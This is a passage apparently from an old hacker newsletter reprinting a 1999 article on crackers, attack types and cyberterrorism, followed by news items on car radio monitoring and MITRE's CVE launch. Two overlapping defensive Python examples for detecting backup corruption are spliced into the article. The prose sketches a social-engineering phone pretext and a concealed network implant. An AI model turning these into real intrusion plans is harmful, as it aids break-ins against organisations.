divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat'
hackers (crackers).
According to hackers, 99% of cracking incidents can be blamed on so-called
'script-kiddies'. These are usually young people who manage to acquire some
'cracking tools' somewhere on the Internet and are keen to try them. They choose a
'cool' target (such as NASA, the Pentagon or the White House) and launch the
tools. Older, more established
hackers see them as upstarts. Think of a kid walking down a corridor
testing doorknobs; whilst they are more than capable of defacing
websites such as that of the Central Intelligence Agency (CIA), their
actions are seen as the equivalent of putting down a whoopie cushion
on the chair of the UN Secretary General - juvenile, noisy and
somewhat embarrassing, but ultimately without real effect. Says Mick
Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about
waking up to find graffiti (which is all it is) on one of my customer's sites."
However, even minor exploits illustrate one of the many paradoxes facing
computer security. Specific websites, intended for the computer systems
administrators and webmaster audiences, monitor the security vulnerabilities
(bugs) in software that allow exploits to take place. The purpose of these
websites is to distribute the corrective programming 'patches' that rectify the
bugs. However, such sites are open to the public and are therefore the ideal
place for crackers to discover new cracks. The result of this is that the vast
majority of methods used by crackers to break into sites are known and there
are patches available. This means that many believe the responsibility for
security breaches lies not with the software supplier but with the company that
owns and operates the system. Thus, if a company suffers a security breach,
that highlights its own negligence or incompetence, which, along with the bad
publicity associated with intrusions, makes it unsurprising that many companies
are reluctant to publicise security breaches of their systems. This is especially
true of the financial sector: there have been rumours for several years that banks
have been blackmailed by hackers; confirmation has never been forthcoming.
Cracker profile
Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by
Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the
Electronic Frontier, puts the total number of hackers at about 100,000, of which
10,000 are dedicated and obsessed computer enthusiasts. A group of 250-1,000
are in the so-called hacker 'élite', skilled enough to penetrate corporate systems
and to unnerve corporate security. Given the huge number of people working as
programmers for the online economy (the technical side of which requires much
the same skills as those required by a hacker), the totals are sure to rise.
According to the Center for Research on Electronic Commerce at the University
of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2
million jobs in the USA alone.
The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read
English and follow directions. Indeed, much can be gleaned from books or
documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst
exploits can be learned from websites such as 'bugtraq', 'rootshell' or
'packetstorm'. In fact, virus-writing and exploit code is common, and some is
even automated.
However, to launch a sophisticated attack against a hardened
target requires three to four years of practice in C, C++, Perl and
Java (computer languages), general UNIX and NT systems
administration (types of computer platform), LAN/WAN
theory, remote access and common security protocols (network
skills) and a lot of free time. On top of these technical nuts and
bolts, there are certain skills that must be acquired within the cracker
community.
Tools of the trade
The cracker skillset is more common in highly educated individuals taught in the
USA and Western Europe, although anyone with enough intelligence and time
can pick it up without formal schooling. In fact, the skills are not at all rare or
unusual, being the same as those required for an average, small or
medium-sized company network system administrator: a position which
commands among the lowest pay in the computer industry. The chances are
that there is a university drop-out in your town with all of these prerequisites. That
said, a list of qualifications does not fully explain their make-up, as the skillset is
more to do with lifestyle than specific capabilities. Some people collect baseball
cards; others analyse [computer network] protocols.
Attacks happen in various guises, from the simple and automated to the highly
disguised and sophisticated. Crackers also write their own tools, which are
disseminated in the underground. Certain system diagnostic tools and other
cracker script tools can significantly automate the process of cracking less
secure systems. At the low end of the sophistication scale there are activism
websites, such as 'Floodnet', which hold web-page functionality that automates
the process of reloading another website's pages in an attempt to make the
system 'overheat' so that it ceases to work. This is a form of the most common
exploit, Denial of Service (DoS), which comes in many forms. It is most common
due to webmasters and web server administrators creating poorly written
Common Gateway Interface (CGI) scripts (website programming). Exploiting the
poorly written code is no great feat. In the words of one hacker: "Any punk kid
could do this to any organisation without any trouble whatsoever."
Computer specialists suggest that, while annoying, such unsophisticated DoS
attacks have a hidden danger: they could mask the use of specialist software
custom-written by an élite cracker amid the noise of the barrage of multiple
automated attacks. Other tools exist that are designed by the hacker
community, such as BO2000, which was specifically created to embarrass
Microsoft's Windows NT security. In fact, the size of the black market in software
(computer programmes) is enormous. Not only can exploit tools be procured in
this manner, but they can easily be found online.
Social engineering
Social engineering is a term describing the process whereby crackers engineer a
social situation that allows any potential cracker to obtain access to an
otherwise closed network. This access could either be permanent (infiltrating an
insider into the organisation who enables outside access), or temporary. Indeed,
the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT
support. I'm having trouble with the modem bank. Can you check the modem to
make sure it's turned on? Also, can I have the number to make sure I'm using the
right one?" Of course, being a diligent and helpful worker, the recipient of such a
call is only too happy to help.
Most previous instances of information technology (IT) security violations have
been attributable to 'inside jobs', which is why there has been significant
controversy recently about US concerns hiring foreign programmers to rectify
Y2K issues.
Having gained access, a cracker can either install code directly
into the systems on the spot or add a transmitter device. To
illustrate a scenario, after gaining access to a facility as cleaning
staff, the perpetrator could put a small computer, itself connected
to the main network, into the base of a lamp with an infra-red port
(network connection) aimed out the window of an office or linked to
a mobile phone. This gives an active presence on the target network and, more
importantly, remote access to the device from anywhere within line of sight. In
commercial environments, the security teams that search for bugs (bugs in the
classical sense - 'listening devices') with receivers do not generally do infra-red
profiles of a building; such a device will not transmit unless active, so sweeping
for it is more difficult than trying to detect a bug that is monitoring audio.
Cellular modems also work, but are potentially detectable by radio-frequency
sweeps. However, for corporate espionage it is an easy matter to pre-position
several such systems and then take advantage of security vulnerabilities to gain
permanent entry to the system. The phone company makes entry easy if the
location is near a residential area as a receiving mobile phone just needs to be
plugged into the network interface (telephone connection) of any house. Such
attacks are not new, but the scale of machines necessary to realise them is
down to 4in² of PC board for an amateur willing to spend a little time shopping in
the back of a technology magazine. "For less than US$1,000 you could build
such systems and disguise them as appliances like lamps," said Paul Roberts,
a US-based information security (INFOSEC) specialist.
Espionage on other computers by remotely monitoring the electro-magnetic (EM)
signals they emit whilst in use is possible today, albeit expensive. Figures of
$35,000 are quoted as estimates for a remote monitoring station in a van, for
example, although the cost is coming down. "EM snooping technology might
very well come into the reach of the advanced information security hobbyist or
the determined criminal in the next five to 10 years," said Markus G Kuhn from
the Computer Laboratory at Cambridge University in the UK.
Cracking: methods
Exploits come mainly in three species: DoS; destruction of information (erasing);
and corruption of information (spoofing).
As indicated previously, DoS attacks take the form of overloading the processes
of the computer hosting the website (the server), which then shuts itself down.
Recently, a new form of such attacks has become prevalent - the 'distributed
co-ordinated attack' - in which thousands of servers are used in unison. "It's
possible to detect the attack, but it is very hard to block it using current
software," said Thomas Longstaff, senior technical researcher for the Software
Institute at Carnegie Mellon University. However, a co-ordinated attack to bring
down a government's or a corporation's computer systems cannot be maintained
long enough to be more than a nuisance. Yet while only annoying at the
moment, as interconnectivity increases and the importance of the online
economy becomes manifest, such exploits will have serious financial
implications. That said, recovery from such an attack tends to be fast.
Erasing is considered very difficult to conduct because any system worth
attacking is also worth backing up. UK and US interbank transactions are
backed up daily with multiple remote tapes, so any cracker wanting to destroy
the interbank market will cause the loss of at most one day's transactions.
However, this is not without consequence: consumer confidence in the banking
system might drop to unprecedented levels were exploits to be publicised.
Viruses are a form of erasure most computer users are familiar with. Indeed, as a
teenager Robert Morris accidentally launched a virus that shut down most of the
Unix-based computers in the USA in the 1980s. Much can be said for judging the
security implications of information technology by the fact that virus protection is
now standard on any company computer. A good thing too, as 1999's 'Melissa
virus' was the first of a new generation of Microsoft-targeted viruses that are
self-replicating by sending themselves forward in an email entitled 'Important
message from . . .' to the people listed in a person's Outlook Express email
package without their knowledge. The 'Bubbleboy' virus promises to be worse, as
you just have to receive it to be affected. Erasing attacks can be guarded against
through multiple, remote (in both geography and network topology) back-ups,
taken at sufficient frequency that the maximum possible loss is bearable for the
system (the 'safe frequency'). Any system for which the safe frequency is too low
for the defence to be practical (such as a power grid) tends to be kept remote from
networks, although this is not always the case.
Yet for every solution there is a problem. The effectiveness of back-ups can be
circumvented by malicious programming that corrupts one random byte in the
data; even though the back-ups look good, the data is bad. There is no way of
telling unless the whole tape is recovered to find the one or two data files that
have changed and examining them 'with a microscope'. The problems are obvious
if someone had 10 weeks of back-ups, each with different bits of bad data, and
all the back-ups were infected. There would be no way to know which data was
good and which was bad. Indeed, if the cracker knows enough about the system
he/she is attacking, recovery may be impossible.
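The paragraph above argues that a single corrupted byte defeats back-ups because "the back-ups look good". The defence is to record, at back-up time, something the corruption cannot forge. The following is an added example (not from the Jane's article or any product it mentions): each back-up generation is stored with a manifest of per-file SHA-256 digests, sealed with an HMAC under a key that is assumed to be kept off the backed-up system, so a later one-byte change is found without examining every file by hand. The file names, contents and key are constructed sample data.

```python
"""Detect silent single-byte corruption in back-up generations.

Added example: a manifest of SHA-256 digests is taken when the back-up is
written and sealed with an HMAC, so a later change to the data (or to the
manifest itself) is detected. All file names, contents and the key below
are constructed sample values, not anything from the article.
"""
import hashlib
import hmac

# Constructed key; in practice it lives off the system being backed up.
MANIFEST_KEY = b"constructed-manifest-key-not-a-real-secret"


def _manifest_body(digests: dict) -> bytes:
    return "\n".join(f"{name} {d}" for name, d in digests.items()).encode()


def make_manifest(files: dict, key: bytes = MANIFEST_KEY) -> dict:
    """Record one digest per file plus a keyed MAC over the whole manifest."""
    digests = {name: hashlib.sha256(data).hexdigest()
               for name, data in sorted(files.items())}
    mac = hmac.new(key, _manifest_body(digests), hashlib.sha256).hexdigest()
    return {"digests": digests, "mac": mac}


def verify_backup(files: dict, manifest: dict, key: bytes = MANIFEST_KEY) -> list:
    """Return the names of files that differ from the manifest (empty = clean).

    A manifest whose MAC does not verify is reported as '<manifest>' so that an
    attacker who rewrites both the data and its digests is still caught.
    """
    expected_mac = hmac.new(key, _manifest_body(manifest["digests"]),
                            hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_mac, manifest["mac"]):
        return ["<manifest>"]
    bad = []
    for name, expected in manifest["digests"].items():
        data = files.get(name)
        if data is None or hashlib.sha256(data).hexdigest() != expected:
            bad.append(name)
    # Files that were not present when the manifest was written count too.
    bad.extend(sorted(set(files) - set(manifest["digests"])))
    return bad


def flip_one_byte(data: bytes, offset: int) -> bytes:
    """Simulate the 'one random byte' corruption the article describes."""
    return data[:offset] + bytes([data[offset] ^ 0x01]) + data[offset + 1:]


def first_clean_generation(generations: list, manifests: list):
    """Given back-ups oldest-first and their manifests, return the index of the
    newest generation that verifies clean, or None if every copy is bad."""
    for i in range(len(generations) - 1, -1, -1):
        if not verify_backup(generations[i], manifests[i]):
            return i
    return None


# Constructed sample back-up and a copy with one byte flipped in the ledger.
SAMPLE = {"ledger.csv": b"acct,amount\n1001,250.00\n1002,75.50\n",
          "notes.txt": b"quarterly close\n"}
SAMPLE_MANIFEST = make_manifest(SAMPLE)
CORRUPTED = dict(SAMPLE, **{"ledger.csv": flip_one_byte(SAMPLE["ledger.csv"], 14)})

if __name__ == "__main__":
    print(verify_backup(SAMPLE, SAMPLE_MANIFEST))     # []
    print(verify_backup(CORRUPTED, SAMPLE_MANIFEST))  # ['ledger.csv']
```

The point of `first_clean_generation` is the article's "10 weeks of back-ups, each with different bits of bad data" case: with a sealed manifest per generation, the operator can walk backwards to the newest copy that still verifies instead of guessing which tape is good.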
Spoofing is much more difficult to guard against. This kind of attack comes in
two guises: attempts to create phoney records or phoney messages in a system
(such as creating false bank accounts); or attempts to create phoney
instructions to the processing system, causing a failure of the system. This is as
bad as an erasing attack. The easiest way to defend against non-destructive
spoofing is again to use back-ups and to operate double-entry book-keeping,
which traces every record to its creation and requires consistency between
numerous (again, preferably topologically remote) sources. This multiplies the
difficulty of an attack as the attacker has to break several systems instead of
just one. By appearing to be a user, however, a cracker could manipulate data or
corrupt the hardware by installing a virus, for example. While this would not be
quite like a bomb going off, it could have much worse long-term repercussions.
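The silent one-byte corruption described above, and the cross-source consistency check that the double-entry argument relies on, as an added example (not code from the article): per-file digests recorded when each backup generation is taken let a defender find which file changed without a logged reason, which generation is the last good one, and where copies held at separate sites disagree. All data below is constructed.

```python
"""Detecting silent backup corruption with per-file digests.

Added example. Three weekly backup generations of a small records directory
are modelled as dicts of path -> bytes. Between generation 0 and 1 a record
is legitimately appended (and logged); between generation 1 and 2 nothing
legitimate changes, but one byte of one file is flipped.
"""
import hashlib


def manifest(files):
    """Map each path to the SHA-256 of its content.

    Compute this when the backup is taken and keep it somewhere the backup
    media cannot alter it; a generation can then be checked without reading
    every file by hand.
    """
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def diff_manifests(old, new):
    """Return (added, removed, modified) path sets between two manifests."""
    added = set(new) - set(old)
    removed = set(old) - set(new)
    modified = {p for p in set(old) & set(new) if old[p] != new[p]}
    return added, removed, modified


def unexpected_changes(old, new, changelog):
    """Modified files that the system's own change log does not account for.

    A legitimate update leaves a log entry; a byte flipped by malicious code
    or failing media does not, so it surfaces here.
    """
    _, _, modified = diff_manifests(old, new)
    return modified - set(changelog)


def last_good_generation(generations, path, known_good):
    """Index of the newest generation whose copy of `path` still has the
    known-good digest, or None if every retained generation is bad."""
    for i in range(len(generations) - 1, -1, -1):
        if generations[i].get(path) == known_good:
            return i
    return None


def cross_site_mismatches(copies):
    """Paths on which copies held at different sites disagree.

    Copies that are remote from each other (in geography and topology) are
    unlikely to be corrupted identically, so a disagreement marks the file
    to examine rather than the whole tape.
    """
    paths = set().union(*[set(c) for c in copies])
    return {p for p in paths if len({c.get(p) for c in copies}) > 1}


# Constructed sample data.
GEN0 = {
    "accounts/ledger.dat": b"ACCT 1001 BAL 250.00\nACCT 1002 BAL 80.00\n",
    "accounts/index.dat": b"1001,1002\n",
}
# Generation 1: a new account is appended; the application logs the change.
GEN1 = dict(GEN0)
GEN1["accounts/ledger.dat"] = GEN0["accounts/ledger.dat"] + b"ACCT 1003 BAL 12.50\n"
GEN1["accounts/index.dat"] = b"1001,1002,1003\n"
CHANGELOG_0_TO_1 = ["accounts/ledger.dat", "accounts/index.dat"]
# Generation 2: nothing legitimate happened, but byte 15 of the ledger is
# flipped (the '5' in 250.00 becomes '4'). File sizes are unchanged, so the
# backup "looks good" to a size or file-count check.
_damaged = bytearray(GEN1["accounts/ledger.dat"])
_damaged[15] ^= 0x01
GEN2 = dict(GEN1)
GEN2["accounts/ledger.dat"] = bytes(_damaged)
CHANGELOG_1_TO_2 = []

GENERATIONS = [manifest(GEN0), manifest(GEN1), manifest(GEN2)]


def audit():
    """Run the checks across the constructed generations and return a report."""
    ledger = "accounts/ledger.dat"
    return {
        "unexplained_0_to_1": unexpected_changes(GENERATIONS[0], GENERATIONS[1], CHANGELOG_0_TO_1),
        "unexplained_1_to_2": unexpected_changes(GENERATIONS[1], GENERATIONS[2], CHANGELOG_1_TO_2),
        # Generation 1's digest is the last one the change log vouches for.
        "last_good_ledger": last_good_generation(GENERATIONS, ledger, GENERATIONS[1][ledger]),
        # Two sites: one still holds the generation 1 copy, the other the damaged one.
        "site_disagreement": cross_site_mismatches([GENERATIONS[1], GENERATIONS[2]]),
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```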
The Internet Auditing Project
Host count: 36,431,374
Vulnerability count: 730,213
Vulnerable host count: 450,000
Destructive spoofing aimed at the processor rather than its records is a different
matter. Causing the processor to execute phoney instructions could allow an
attacker to erase records, transmit phoney messages and, potentially, cover
his/her tracks well enough to escape consistency checks. This kind of attack is
more difficult than any other - usually the only way to get another machine to
execute rogue instructions is to exploit 'buffer overflows', overloading the
temporary data buffer on computers.
Nightmare scenarios are based on such attacks. "We could wake one morning
and find a city, or a sector of the country, or the whole country having an electric
power problem, a transportation problem or a telecommunication problem
because there was a surprise attack using information warfare," claims Richard
Clarke, the US National Security Council adviser who heads counterterrorism
efforts. Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray,
recognised as one of the premier cracker-catchers in the business: "One hacker
shut down a Massachusetts airport, 911 emergency service and the air traffic
control system while playing with the municipal phone network, and another
hacker in Phoenix invaded the computer systems of one of the public energy
utilities, attaining 'root' level privileges on the system controlling the gates to all
the water canals from the Grand Canyon south." These examples involved
individuals rather than organised groups, and none of them were politically
motivated.
Cyberterrorism?
In warfare as well as in business, IT is the great equaliser. Its low financial barrier
to entry relative to heavy industry allows even the poorest organisations an IT
effectiveness equal (or nearly equal) to large corporations.
The greatest advantage the covert warfare arms of major nation-states (such as
the CIA or Mossad) have over small terrorist organisations is the financial
wherewithal to develop massive intelligence networks using the best equipment.
IT levels the playing field in this regard.
Because sensitive military computers are required to be kept as far away from
the Internet as possible, a military system cannot be directly attacked unless
there has been some major oversight or an incident of social engineering.
However, there is always a weak link in the chain: for example, an army depends
on Vendor A for supplies/equipment, and Vendor A depends on parts from Vendor B,
and so on. Somewhere in that chain is a vulnerability due to the massive
networks, technological dependence and just-in-time ordering systems. Indeed,
although direct attacks on critical infrastructure are unlikely, if that
infrastructure sits on a network that has a link into it from elsewhere, one
vulnerability is all it takes. Strikes in one automotive plant have effectively
shut down large car makers. Most US automotive plants are also government
contractors supplying vehicles and replacement parts to the military: an obvious
target for planting viruses during war.
Some people collect baseball cards, others analyse protocols
Cyberterrorism is not only about damaging systems but also about intelligence
gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight
analogies with physically violent techniques ignore other, potentially more
effective, uses of IT in terrorist warfare: intelligence-gathering,
counter-intelligence and disinformation.
Disinformation is easily spread; rumours get picked up by the media, aided by
the occasional anonymous e-mail. Cracking into a government server and posting
a new web page looks impressive and generates publicity, but cracking into a
government server and reading private email is much more valuable to terrorists.
This gives cyberterrorists valuable details about the thought and operations of
their adversaries, and can aid in planning conventional attacks. Furthermore, if
terrorists can penetrate the security of an enemy organisation's computer
networks, they do not need to do any damage to be militarily effective. Rather,
they can quietly copy information to process at their leisure, without having to
physically smuggle it out of secure facilities. False or misleading information can
be planted in (or deleted from) databases, undermining the effectiveness of
organisations relying on that information. In today's environment, authentication
via strong encryption is still rare and IT makes forgery easy. Credentials can be
forged to fool authorities or the media for purposes of disinformation or to
enhance covert physical activities.
As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining'
techniques can be used to search for useful patterns in vast stores of insecure
and seemingly unrelated data. A bank may assume its electronic fund transfer
system is the most vital system to protect, but a terrorist may only want access
to the financial records of persons or groups that are the bank's customers. This
may not even involve destruction of data, as the pure information is often much
more valuable than simply destroying random records. Reconnaissance attacks
such as these are difficult to stop but extremely damaging. In the long-term
banking scenario, the terrorist may simply choose to track sources of funding
based on deposit records to harm the person or group who is the target. In a
situation like this, going into the bank to destroy the information is only a
temporary setback and will raise attention. Why destroy a valuable point of
information gathering by doing something short-term like disrupting operations?
Nevertheless, for the terrorist, cracking might be used for more than just
destroying data. Attacking an information system would be a good way to either
distract the target or otherwise enable the terrorist to perform a physical
attack. An example might be to crack into an airline and delete transport
manifests to cover the transport of illegal materials. Had Shoko Asahara and the
Aum Shinrikyo group been able to crack the Tokyo power system and stop the
subways, trapping passengers on the trains, the number of casualties caused by
their 1995 Sarin gas attack might have been significantly larger. If a
determined group wanted to bring New York to its knees, what better way than to
combine a physical bombing campaign with simultaneous IT attacks on the power
grid, hospitals, emergency services and the media?
Turning to the larger picture, in warfare the party that runs out of funds first
loses. Thus, the objective of warfare may not just be to inflict as much physical
damage as possible, but instead be to maximise financial damage. The Irish
Republican Army (IRA) learnt to use this concept very effectively in recent
years, sufficiently occupying the resources of the British government through
infrastructural attacks (as opposed to direct attacks against people). This
suggests that, in the future, stock markets or other primary financial
institutions might become high-profile targets and the most effective means of
accomplishing a terrorist's goal. More damage would be accomplished by taking the
New York Stock Exchange offline for a few days than by actually bombing a
building. That said, financial institutions are one of the few parties
recognised in the hacker community for taking their security very seriously
indeed.
Given the predominance of the IT-based industry and the familiarity of the Internet
in the USA and Western Europe, the terrorist groups that fit the motive and
mindset to use cracking could be closed religious or fanatical groups whose
value systems are so out of sync with the mainstream that they feel threatened
enough to take as much of the world with them as they 'go under'. Those groups,
together with 'lone gunmen' and activism campaigns ('hacktivism'), are the
scenarios that appear to fit the profile.
A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a
message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet
begun to fight. The idea of Third World cyberpunks threatening the planet's sole
superpower might seem unlikely - unless, of course, you run Internet sites at
Lackland AFB or the 86 other facilities that their group, the 'Pakistan Hackerz
Club' (PHC), has struck in the past five months.
The PHC's self-described founder and perhaps the world's most prolific Web
cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a
cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian
missives on Internet sites run by the Naval Reserve Maintenance Facility in
Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not
only has become a high-profile 'hacktivist' - a computer cracker with a political or
social goal - but a wild card who hints he can wreak havoc far from home.
"We don't have any intentions to compromise any sort of military or governmental
database, but in case there will be a cyber war with Pakistan, then we will sure
prove our knowledge, ability and skills," he warned in an e-mail message. It may
be no idle boast.
Today, employers, even those running critical infrastructure, are hard-pressed to
not give employees Internet access; 401k retirement plans, health insurance
plans and others are starting to mandate it. Most employees are on insecure,
poorly administered, unreliable desktop operating systems: the recipe for serious
electronic mayhem.
Beyond the hype
Critics maintain there is no such thing as cyberterrorism, and there is
undoubtedly a lot of exaggeration in this field. If your system goes down, it is
much more interesting to say it was the work of a foreign government rather than
admit it was due to an American teenage 'script-kiddy' tinkering with a badly
written CGI script. If the power goes out, people light a candle and wait for it to
return, but do not feel terrified. If their mobile phones switch off, society does not
instantly feel under attack. If someone cracks a web site and changes the
content, terror does not stalk the streets. Some groups talk of taking down power
grids; while that would help in conjunction with another type of attack, in itself it
would be useless. Most grids suffer infrequent black-outs anyway that are not
terrorist-related. In fact, terrorism campaigns using just computers are unlikely.
The sheer size of programmes works against the attacker more than the
defender. No one person can fully understand a programme comprising over a
million lines of code, especially if he/she did not write it, and the defender has
more people available. Critical programmes that run infrastructure functions, such
as traffic lights, are usually custom-written, making them twice as difficult to
attack.
Any system put together in the last few years will have been implemented with
security in mind. Ironically, Y2K could prove to be a boon, as audits will give
detailed reports on exactly what is in a system and this information can be used
to boost security.
Most security-aware organisations do not put highly sensitive (such as military or
corporate) data on servers that are accessible via the Internet and design their
Internet servers to be disposable and easily reinstalled from compact disc (CD)
or tape. These organisations also typically keep their servers in restricted-access
areas. Most organisations with sensitive data also keep off-site back-ups.
Write-once CDs are becoming very popular as they are inexpensive, compact
and convenient to restore from. To cause serious and lasting damage, a terrorist
would need to destroy or corrupt not only the contents of the servers, but also
the off-site back-ups.
Reality bytes
In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct
anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway
a populace by fear would therefore be less interested in such an attack unless
they could carry out an extremely damaging one on a repeatable basis or unless
they used it to augment the effects of a physical attack.
As things stand, while a terror attack using crackers is potentially highly
destructive, the psychological impact of the disruption of services is still much
lower than that of a direct physical attack.
Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his
Masters at St Andrews University. He gratefully acknowledges the contribution
and advice of people at Slashdot.org.
@HWA
17.0 Car Radio Listening Habits Being Gathered
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Think you're safe from the prying eyes of the data
collector when you're peacefully driving your car and
listening to the radio? Think again. New technology
being tested in Atlanta, Toronto, Los Angeles and
Phoenix can remotely determine what radio station you
are listening to in your car. Small shoebox-size
electronic sensors posted on billboards and light poles
can listen to the signal from the oscillator in the car
radio, determine the frequency and log the information
in a central database. This information is then made
available to subscribing radio stations in real time to
help in determining ratings numbers. (Even though this
system does not collect demographic data, can't
collect AM yet, and doesn't listen to homes or
businesses, it is still scary as hell.)
The Atlanta Journal Constitution
http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html
Getting with the program
WCNN to debut as issue-oriented
talk radio geared to Atlanta's
black audience
We've got rock, rap,
country, salsa and
smooth jazz. But come
April 3, Atlanta will have
a new radio format -
black news/talk.
That's when Midwestern
Broadcasting, owner of
adult R&B station Kiss
104.7, will take over
programming of
WCNN/680 AM from Cox Radio and
launch a 24-hour news/talk station aimed at
Atlanta's African-American community.
According to Midwestern Vice President
David Dickey, the station will emphasize
local programs rather than syndicated
shows, and focus on issues such as
education, government, health care and the
economy.
In the next few weeks, the company will
announce the station's new name, unveil a
logo and begin hiring on-air talent.
The takeover will end WCNN's lineup of
news/talk shows, including Tom Hughes in
the morning, the syndicated G. Gordon
Liddy show at midday and Neal Boortz
producer Royal Marshall's talk show in the
afternoon.
"I don't think Neal [Boortz] or Dr. Laura
[Schlessinger] are focused on the needs
and issues of the average
African-American listener," Dickey said,
referring to popular programs on news/talk
stations WSB-AM and WGST-AM/FM.
"If we are here to serve the black
community, programming has to originate
from that community. If you had to pick any
city in America to support this effort, Atlanta
is the city to do it."
According to Arbitron, the company that
provides radio ratings, 769,000 of Atlanta's
3 million radio listeners ages 12 and older
are black.
As news of the venture trickled into the
radio community Tuesday, many industry
observers seemed to believe that a black
news/talk station would be a savvy addition
to Atlanta's increasingly competitive and
lucrative radio market.
At 50,000 watts in the daytime and 10,000
watts at night, WCNN is the
second-strongest AM signal in town,
behind WSB.
"Oooh, that's smart," said Star 94 general
manager Mark Kanov upon hearing the
news. "A market like Atlanta would certainly
have a strong core for a station like that. On
the surface, it seems like it would have a
very strong appeal."
"It's what I would do if I owned the station,"
said Andrew Saltzman, general manager of
Sportstalk 790/The Zone. "Talk radio is a
booming format, and that's a
[demographic] that's not truly being catered
to. Why shouldn't the urban community have
full-service talk radio?"
Black news/talk is not a new idea. The
format has been successfully adopted by
WOL in Washington and WLIB in New
York. But because there was usually only
one per community, urban radio stations
have not broken into niche formats as
quickly as stations geared to white
audiences.
For example, V-103, Atlanta's top-rated
urban station, was the only major FM
station catering to the African-American
audience until 1992, when Kiss 104.7
signed on the air. V-103 morning host
Frank Ski explained how such exclusivity
affected the listening habits and
expectations of the black radio audience.
"For a long time, the lack of radio stations
available to minorities meant we didn't
have a second or third choice when it came
to radio," Ski said. "That made the black
community begin to like a whole package
of things [on one station].
We want to hear music, hear something
funny and be informed. Black talk can be
good for the market if it's done right. The
difficulty is that because we haven't really
had it, there's not a lot of good, available
talent to do it. They will be competing with
the white news-talk stations, so they really
need to have their game together."
Midwestern Broadcasting, which is owned
by the Dickey family, has specialized in
creating formats for the African-American
community, such as the adult R&B of Kiss
104.7 and the contemporary gospel of
Glory 1340 AM. However, some have
raised questions as to whether white
management is politically or socially
motivated.
Ryan Cameron, morning man at rap station
Hot 97.5, wonders whether Midwestern will
take the new station into the community as
much as he or Ski do with their shows.
"Anything that's going to make the market
more interesting is definitely a plus,"
Cameron said. "It's great to raise issues
and talk, but how visible will they be?
It's not like they got new owners. I'll be
curious to see how much involvement there
will be in the community other than
monetary."
Dickey doesn't believe that a black
news/talk station with white ownership will
cripple its chances of success.
"Race has nothing to do with it, it just
makes good economic sense," he said.
"Sure, we're trying to make a buck off this.
But more important, we've been able to
provide a choice for African American
listeners in Atlanta.
As a broadcaster, it's my responsibility to
research the market and find the
opportunities that are there. We have two
well established radio stations in Kiss and
Glory, and this is an extension of that niche.
I don't care if you're white, black, Chinese,
male, female, young or old, it doesn't make
sense to go up against established
stations like WSB or WGST. [A black
news/talk station] complements our
package.
We can cross-promote each station with
the other two. We can utilize people who
appear on one and put them on the other."
The transaction does not involve the sale of
680 AM, rather a switch in who is calling
the shots about what is on the air. For five
years, Midwestern Broadcasting, which
owns the frequency, has leased 680 AM to
Cox Radio, owner of news/talk giant
WSB-AM (750).
Cox Radio has spearheaded
programming, first as a sports-talk station
(680/The Fan), then turning WCNN into a
news/talk station in 1997. The lease
between the two companies expires April
2.
According to Marc Morgan, co-chief
operating officer of Cox Radio, the
decision to end the arrangement was
mutual.
"When we made this [leasing] deal five
years ago, it made great sense at the time
and served the purpose it was meant to
serve," he said. "There's definitely a hole in
the market for a black talk station, and I
think it's a good idea. ... I haven't heard it
yet, so I couldn't even begin to speculate on
what effect, if any, it would have on any
other station in town."
@HWA
18.0 CVE by Mitre Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Common Vulnerabilities and Exposures database run
by Massachusetts defense contractor Mitre has gone
online. The database hopes to help standardize
computer security terms and set a common vocabulary
for building more secure systems. The database hopes
to contain all known system vulnerabilities. (It is unlikely
that any of the big 5 security companies will give up
new vulnerabilities that only they know about for their
competitors to find in this database. The database is
already missing some key advisories that have been
publicly released.)
The Boston Globe
http://www.globe.com/dailyglobe2/335/business/Handle_on_hackers%2b.shtml
Common Vulnerabilities and Exposures Database
http://www.cve.mitre.org/
Handle on hackers
Bedford firm seeks security standard with
software-weakness list
By Ross Kerber, Globe Staff, 12/01/99
BEDFORD - Before the invention of the periodic table in 1869, chemists
struggled to put elements such as hydrogen and lithium into a coherent
classification scheme.
Today, parts of the field of computer science now seem stuck with the same
lack of organization. In particular there is little agreement among software
security specialists on just how to classify the sections of computer code that
are often targeted by hackers.
Government and academic groups have attempted to categorize these
software Achilles' heels for years, to little commercial enthusiasm.
But now some steam is gathering behind a project run by Bedford-based
Mitre Corp. to create a simpler listing of weaknesses. The project doesn't try
to classify codes and other security problems into families or types, but only
to list them as part of what Mitre calls a directory of ''Common Vulnerabilities
and Exposures.''
By dumbing down its directory, known as the CVE, Mitre has persuaded 23
organizations including Cisco Systems Inc. and IBM Corp. to participate. The
result can be found on line at www.cve.mitre.org, and executives hope it will
help standardize terms and set a common vocabulary for building more secure
systems.
''The beauty of the approach we've taken is to avoid everybody arguing''
about complicated categorizations, said Steven Christey, a software engineer
at Mitre, a nonprofit government contractor.
His colleague, David Mann, compares the CVE to the lists of individual
elements that were drawn up long before the periodic table was accepted.
''To get things going scientifically we really need to start small,'' Mann said.
''Hopefully it will spawn more categorizations, eventually.''
While software viruses are quickly studied and named, the security
